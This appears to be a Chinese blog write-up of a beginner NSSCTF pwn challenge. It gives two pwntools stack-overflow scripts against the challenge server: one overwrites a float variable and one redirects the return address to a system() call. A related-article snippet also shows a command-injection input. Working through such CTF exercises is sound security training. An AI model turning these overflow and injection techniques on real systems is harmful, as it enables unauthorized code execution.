NSSCTF ID:100

最新推荐文章于 2024-09-28 22:34:31 发布
最新推荐文章于 2024-09-28 22:34:31 发布
阅读量428 收藏 6
点赞数 19
分类专栏: NSSCTF pwn 文章标签: 网络安全 安全 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62987578/article/details/139801429
版权

image.png
checksec一下,然后再直接连上去试试
image.png
没用,我们之间去IDA分析好了
image.png
代码逻辑就是我们输入等于11.28125就把flag给我们,去试试
image.png
发现他还是说我们是错的,这我就不是很明白了
后面看来大佬们的WP,才知道这里不能直接输入,需要转换一下
image.png
大佬的方法是用溢出v1的值溢出,使v2的值为11.28125
image.png

from pwn import *
import struct


io = remote('node4.anna.nssctf.cn',28127)

sh=11.28125

sh_bytes=struct.pack('f', sh)

payload=b'a'*44+sh_bytes

io.sendline(payload)

io.interactive()

这就是脚本,参考https://www.nssctf.cn/note/set/7051
image.png
这样就成了
后面看到还有一种方法
image.png
就是在这里,我们看到了有gets,有system直接让gets溢出,然后执行system,说干就干,试试
image.png

from pwn import *
import struct


io = remote('node4.anna.nssctf.cn',28127)

#sh=11.28125

#sh_bytes=struct.pack('f', sh)
cat=0x004006BE

payload=b'a'*0x30+b'b'*8+p64(cat)

io.sendline(payload)

io.interactive()
阿百川a_bai_chuan
关注
专栏目录
NSSCTF】刷题记录——[SWPUCTF 2021 新生赛]系列(WEB篇)
jameshuangchuan的博客
08-08 2963
此处主要在NSSCTF平台()上开展刷题。
NSSCTF ID:390
qq_62987578的博客
06-18 211
没用,接下来去分析一下代码,进IDA。直接checksec一下,64位。然后就是写攻击脚本了。
NSSCTF ID:389
qq_62987578的博客
06-18 523
我开始入门pwn了,可能有些地方讲的不是很清楚,如果有讲错的地方,各位大佬一定要指点指点我。发现是python代码,blacklist是黑名单,所以这里我们要想办法绕过这个黑名单。但这里好像还是被检查到了,自己看了一下代码,发现是空格也被过滤了,需要转义一下。这里我通过l\s绕过了ls的检测,后面也打算这样绕过。尝试了很多种绕过方法,终于成功了。这里顺便总结一下有哪些绕过方法。
NSSCTF ID:3875
qq_62987578的博客
06-18 260
这个直接nc上,然后根据提示输入 echo $FLAG就能得到了。
NSSCTF ID:709
qq_62987578的博客
06-19 123
这里虽然限制了我们的输入长度,但我们仍可以通过输入-1来绕过,原理大家可以看看参考。checksec和直接nc我就不写了,大家都知道,我们直接来看看IDA吧。读取我们两次输入,第一次是名字长度,第二次是名字。这里也找到了后门,直接开始写脚本来攻击了。
NSSCTF练习记录:POST注入
qq_44396970的博客
08-06 379
用hackbar的POST传参。
NSSCTF练习记录:[SWPUCTF 2021 新生赛]jicao
qq_44396970的博客
08-05 192
对index.php文件进行语法高亮显示,插入flag.php文件,变量id的值为POST传递的值,变量json的值为GET传递的json类型的值。当id值为wllmNB且json中含有键为“x”,值为“wllm”的时候,输出flag。运行后flag就显示出来了。用hackbar传递参数。
4.LiCTF NSSCTF WEB方向部分 WriteUp
qwsn
05-14 2879
找到jsfuck进行解密得到:NSSCTF{4[]b0[]8[]5[]0[]1[]6[]-8[]ace-4[]1[]0[]7[]-8[]4[]d0[]-1[]da4[]1[]ab1[]0[]8[]ba}源码后,查看用到了js文件http://node6.anna.nssctf.cn:28119/dist/index.umd.js。查看源码,找到一个js文件夹,http://node5.anna.nssctf.cn:28482/src/game.js。
NSSCTF web刷题记录7
rev1ve的博客
12-11 469
将url的字符串拿去解码,得到json格式数据。打开题目发现是curl命令,提示填入url。读取下环境变量,得到flag。
NSSCTF-SWPU新生赛
weixin_52033041的博客
10-12 2983
SWPU新生赛 Web gift_F12 右键查看源代码 caidao 页面就有木马密码,蚁剑连接即可 flag在/目录 jicao 源码: <?php highlight_file('index.php'); include("flag.php"); $id=$_POST['id']; $json=json_decode($_GET['json'],true); if ($id=="wllmNB"&&$json['x']=="wllm") {echo $flag;} ?>
NSSCTF刷题wp——常用编码
YougerXen的博客
04-10 4398
NSSCTF Crypto 探索 常用编码 前两个题ID303,287在入门时做过了,详见另一篇wp链接 [AFCTF 2018]BASE ID:463 打开文件直接麻了,如果人工解码,估计黄花菜都要凉了,这就需要用到拥有强大数据处理能力的python了,下面是我借鉴得几个大佬的脚本。 首先是大佬xenny的,NSSCTF这个题的wp也有 import re, base64 s = open('/Users/x3nny/Downloads/flag_encode.txt', 'rb').read() bas
NSSCTF刷题wp——Crypto入门
YougerXen的博客
04-10 2092
NSSCCTF Crypto 探索 Crypto入门 [鹤城杯 2021]easy_crypto ID:453 公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业平等民主公正诚信和谐公正文明公正爱国自由诚信自由平等文明公正诚信富强自由法治法治平等平等自由平等富强法治诚信和谐 社会主义核心价值观密码,直接解,在线工具 解出后得fl
NSSCTF-SWPUCTF 2021 新生赛-web-wp
F1rstb100d
09-19 758
NSSCTF-SWPUCTF 2021 新生赛-web-wp
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8476
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
探索光耦:隔离电压——光耦保障电路安全与性能的关键
forvevr的博客
09-25 633
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
【蚂蚁HR-注册/登录安全分析报告】
最新发布
09-28 466
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
【车联网安全】车端网络攻击及检测的框架/模型
#7的博客
09-24 1354
本文主要调研了车联网安全的一些攻击及检测的模型/框架,对国家标准进行了调研,并汇总上述调研内容。
个人计算机与网络的安全
nn_84的博客
09-24 284
关于 wifi 大家都知道 wifi 已经使用了 wpa3 非常安全 但很多人不知道 pin 和 wps 这两项有漏洞。种漏洞来控制用户电脑 老实说吧 默认用户仍然是管理员 像windows 是很容易得到最高权限的。关于 病毒 大家都知道中国 美国 俄罗斯 的黑客不断的在对抗 所以这病毒花样百出 所以系统用户。关于 国产的 linux 老实说全是漏洞 默认开启 很多服务 但初始化的设置都有漏洞。我发现很多用户都简单设置了这两项 他们的设置 使他们的网络出现了漏洞。
http://node1.anna.nssctf.cn:28558/如何对这个网页执行system('ls); 命令
05-15
这个网页是一个简单的输入框,我们可以尝试输入一些特殊字符来执行命令。在这个情况下,可以尝试使用反斜杠进行转义,然后输入 `;` 和 `ls` 命令。具体操作如下: 1. 在输入框中输入以下内容: `';ls#`。 2. 点击提交按钮,页面应该会返回一个文件列表,这就是 `ls` 命令的执行结果。 需要注意的是,这个网页存在安全隐患,不应该在真实环境中使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值